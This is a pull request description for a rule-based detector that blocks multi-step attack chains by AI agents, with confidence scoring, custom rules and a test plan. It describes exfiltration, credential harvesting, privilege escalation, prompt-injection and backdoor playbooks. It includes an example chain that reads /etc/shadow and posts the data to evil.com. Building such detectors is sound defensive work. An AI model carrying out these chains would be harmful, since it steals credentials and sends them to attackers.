
feat: multi-step attack-pattern detector with confidence scoring #5

Open
azizx4 wants to merge 1 commit into Justin0504:main from azizx4:feat/attack-pattern-detector


azizx4 commented May 31, 2026

Summary

Adds a new meta-kind detector (aegis.builtin.attack-pattern) that catches multi-step attack chains that existing single-step detectors miss. Each call is individually benign, but the sequence reveals the attack.

Example: read_file("/etc/shadow") → http_post("https://evil.com"). Each step passes on its own, but together they amount to data exfiltration. This detector blocks the chain.
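To make the chain idea concrete, here is a minimal sketch of ordered playbook matching over an agent's tool-call history. It is not the code in this PR: `ToolCall`, `Playbook`, `matchPlaybook`, the regex, and the 60-second window are all hypothetical names and values chosen for illustration.

```typescript
// Hypothetical types: the PR text does not show the detector's real interfaces.
type ToolCall = { tool: string; args: string; timestampMs: number };

// A step is a predicate over one call; a playbook is an ordered list of steps.
type Step = (call: ToolCall) => boolean;
type Playbook = { id: string; steps: Step[]; windowMs: number };

// Illustrative matchers only; real rules would need richer heuristics.
const isSensitiveRead: Step = (c) =>
  c.tool === "read_file" && /\/etc\/shadow|\.ssh\/|\.env$/.test(c.args);
const isOutboundSend: Step = (c) =>
  c.tool === "http_post" || c.tool === "send_email";

const dataExfil: Playbook = {
  id: "DATA_EXFIL",
  steps: [isSensitiveRead, isOutboundSend],
  windowMs: 60_000, // assumed window; the PR only names ATTACK_PATTERN_WINDOW_MS
};

// Greedy, earliest-first matching: walk the history in order and advance to the
// next step each time a call satisfies the current one. Steps need not be
// adjacent. Returns the matched calls, or null if the chain is incomplete or
// the matched calls span more than windowMs.
function matchPlaybook(history: ToolCall[], pb: Playbook): ToolCall[] | null {
  if (pb.steps.length === 0) return null;
  const matched: ToolCall[] = [];
  for (const call of history) {
    const next = pb.steps[matched.length];
    if (next && next(call)) matched.push(call);
    if (matched.length === pb.steps.length) break;
  }
  if (matched.length < pb.steps.length) return null;
  const first = matched[0]!;
  const last = matched[matched.length - 1]!;
  return last.timestampMs - first.timestampMs <= pb.windowMs ? matched : null;
}
```

Because the sketch always takes the earliest call that satisfies each step, it can miss a chain whose first step recurs later inside the window. A production matcher would need to handle that case.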

What's new

  • 8 built-in attack playbooks with confidence scoring (0–100):

    | Rule | Chain | Ontology |
    |---|---|---|
    | DATA_EXFIL | sensitive read → outbound send | AAT-T5010 |
    | CRED_HARVEST | credential discovery → exfiltration | AAT-T5011 |
    | PRIV_ESCALATION | recon → sensitive read → priv exec | AAT-T5012 |
    | PROMPT_INJECTION_CHAIN | context poison → exploit | AAT-T1001 |
    | DESTRUCTIVE_ACTION | recon → delete/drop/truncate | AAT-T8004 |
    | ENCODED_EXFIL | sensitive read → encode → send | AAT-T9001 |
    | SUPPLY_CHAIN | package install → execute | AAT-T1003 |
    | ARTIFACT_BACKDOOR | write backdoor file → execute | AAT-T6003 |

  • Confidence scoring with contextual bonuses/penalties:

    • Bonuses: high sensitivity data, external destination, fast timing, upstream anomaly signals, PPM sequence surprise, SlidingWindow burst detection
    • Penalties: internal destination, low sensitivity, long time gap
    • Configurable thresholds: blockThreshold (default 70), flagThreshold (default 40)
  • Custom Rules API: addRule() / removeRule() / getRules() — tenants can define their own attack playbooks at runtime

  • Wired into /api/v1/check: DetectorRegistry now participates in the check decision pipeline. Critical detector signals block requests (Layer 4, after policy + anomaly + DSL).

  • Environment-configurable: ATTACK_PATTERN_ENABLED, ATTACK_PATTERN_BLOCK_THRESHOLD, ATTACK_PATTERN_FLAG_THRESHOLD, ATTACK_PATTERN_WINDOW_MS
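The scoring and threshold behaviour described in the list above could look roughly like the sketch below. Only the 0–100 range, the default thresholds (70 and 40), and the two threshold env var names come from this PR. The signal names, the weights, the `>=` comparison, and the functions `thresholdsFromEnv`, `scoreConfidence`, and `decide` are assumptions for illustration.

```typescript
// Hypothetical signal shape; the real detector also considers PPM surprise
// and SlidingWindow bursts, which are folded into `upstreamAnomaly` here.
type Signals = {
  highSensitivity: boolean;
  externalDestination: boolean;
  gapMs: number; // time between the first and last step of the chain
  upstreamAnomaly: boolean;
};

type Decision = "block" | "flag" | "allow";
type Thresholds = { blockThreshold: number; flagThreshold: number };

// Read thresholds from an env-like record, falling back to the PR's defaults
// when a variable is missing, empty, or not a finite number.
function thresholdsFromEnv(env: Record<string, string | undefined>): Thresholds {
  const num = (raw: string | undefined, fallback: number): number => {
    if (raw === undefined || raw.trim() === "") return fallback;
    const n = Number(raw);
    return Number.isFinite(n) ? n : fallback;
  };
  return {
    blockThreshold: num(env["ATTACK_PATTERN_BLOCK_THRESHOLD"], 70),
    flagThreshold: num(env["ATTACK_PATTERN_FLAG_THRESHOLD"], 40),
  };
}

// Apply bonuses and penalties to a rule's base score, then clamp to 0..100.
// Every weight below is made up for this example.
function scoreConfidence(base: number, s: Signals): number {
  let score = base;
  score += s.highSensitivity ? 15 : -10;
  score += s.externalDestination ? 15 : -20;
  if (s.gapMs < 5_000) score += 10; // fast timing bonus
  else if (s.gapMs > 300_000) score -= 15; // long time gap penalty
  if (s.upstreamAnomaly) score += 10;
  return Math.max(0, Math.min(100, score));
}

// Map a score to a decision; treating the thresholds as inclusive is an assumption.
function decide(score: number, t: Thresholds): Decision {
  if (score >= t.blockThreshold) return "block";
  if (score >= t.flagThreshold) return "flag";
  return "allow";
}
```

In this sketch, raising `ATTACK_PATTERN_BLOCK_THRESHOLD` downgrades borderline matches from "block" to "flag" without touching the rules themselves, which is one reason to keep scoring and thresholding as separate steps.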

How it differs from existing SEQUENCE_ANOMALY

| Existing (PPM) | This PR (Attack Pattern) |
|---|---|
| Statistical: "this transition is unusual" | Rule-based: "this is a known attack playbook" |
| No attack classification | Names the attack (DATA_EXFIL, PRIV_ESCALATION, ...) |
| Binary anomaly score | Contextual confidence score with explainable bonuses/penalties |
| Single transition (bigram) | Multi-step chains (2–3+ steps) |

The two detectors are complementary: PPM surprise feeds into this detector's confidence score as a bonus signal.

Files changed

| File | Change |
|---|---|
| detectors/built-in/attack-pattern-detector.ts | New detector (480 LOC) |
| __tests__/attack-pattern-detector.test.ts | Unit tests (34 tests) |
| __tests__/attack-pattern-integration.test.ts | Integration tests via DetectorRegistry (15 tests) |
| __tests__/attack-pattern-vs-existing.test.ts | Side-by-side comparison with existing detectors (28 tests) |
| detectors/index.ts | Export new detector + types |
| config.ts | Add attackPattern config section |
| server.ts | Register detector with config + SlidingWindow |
| api/check.ts | Wire DetectorRegistry into check decision pipeline |

Test plan

  • 77 new tests across 3 test files — all pass
  • All 558 project tests pass (zero regressions)
  • TypeScript compiles with zero errors (tsc --noEmit)
  • Live server test: read_file("/etc/shadow") → http_post("evil.com") returns "decision": "block" with reason "Multi-Step Data Exfiltration detected (confidence 90%)"
  • False-positive guards: read_file("report.pdf") → send_email("boss@company.internal") passes through as "allow"

Add a new `meta`-kind detector that identifies multi-step attack chains
by tracking per-agent tool-call history and matching against known
attack playbooks. Each match is scored using contextual signals (data
sensitivity, destination trust, timing, upstream anomaly signals) to
minimize false positives.

8 built-in attack patterns:
- DATA_EXFIL (AAT-T5010): sensitive read → outbound send
- CRED_HARVEST (AAT-T5011): credential discovery → exfiltration
- PRIV_ESCALATION (AAT-T5012): recon → sensitive read → priv exec
- PROMPT_INJECTION_CHAIN (AAT-T1001): context poison → exploit
- DESTRUCTIVE_ACTION (AAT-T8004): recon → delete/drop/truncate
- ENCODED_EXFIL (AAT-T9001): sensitive read → encode → send
- SUPPLY_CHAIN (AAT-T1003): package install → execute
- ARTIFACT_BACKDOOR (AAT-T6003): write backdoor file → execute

Key features:
- Confidence scoring (0-100) with configurable block/flag thresholds
- Custom Rules API: addRule() / removeRule() / getRules()
- PPM upstream integration: sequence_anomaly signals boost confidence
- SlidingWindowStats integration: burst detection increases confidence
- Environment-configurable via ATTACK_PATTERN_* env vars
- Wired into /api/v1/check: critical detector signals block requests

77 new tests across 3 test files. All 558 project tests pass.